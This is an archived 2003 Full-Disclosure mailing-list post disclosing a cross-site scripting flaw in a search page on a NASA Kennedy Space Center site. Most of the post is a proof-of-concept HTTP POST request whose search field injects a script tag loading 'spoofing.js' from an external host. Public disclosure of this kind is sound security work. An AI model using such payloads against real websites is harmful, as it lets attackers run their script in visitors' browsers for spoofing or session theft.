[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] More Cross Site Scripting in NASA.gov Sites
- To: "Full-Disclosure" <full-disclosure@lists.netsys.com>
- Subject: [Full-Disclosure] More Cross Site Scripting in NASA.gov Sites
- From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@nsrg-security.com>
- Date: Wed, 15 Oct 2003 01:33:44 +0200
Hi friends,
Another security hole in a nasa.gov website , another XSS:
Use this post request for proof of concept:
_________________________________
POST /search/query.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, */*
Referer: http://www.whereeveryouare.foo
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: si.ksc.nasa.gov
Content-Length: 129
Pragma: no-cache
Cookie: ASPSESSIONID[FIRSTSESSIONSTRING]=[MYSESSION]
Connection: keep-alive
Browser reload detected...
Posting 129 bytes...
SearchString=%22%3E%3Cscript+src%3D%22http%3A%2F%2Ftest-zone.nsrg-security.c
om%2
Fxss%2Fspoofing.js%22%3E%3C%2Fscript%3E
Action=Go
_________________________________
Best regards and remember that security is a mind status !
Greetings to all the community: morning-wood for his arin.net greeting to me
, cyrus-tc , etc.
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html